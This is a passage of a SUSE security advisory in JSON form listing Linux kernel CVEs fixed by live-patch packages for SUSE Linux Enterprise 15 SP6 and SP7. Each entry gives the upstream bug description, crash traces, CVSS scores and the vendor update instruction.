"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
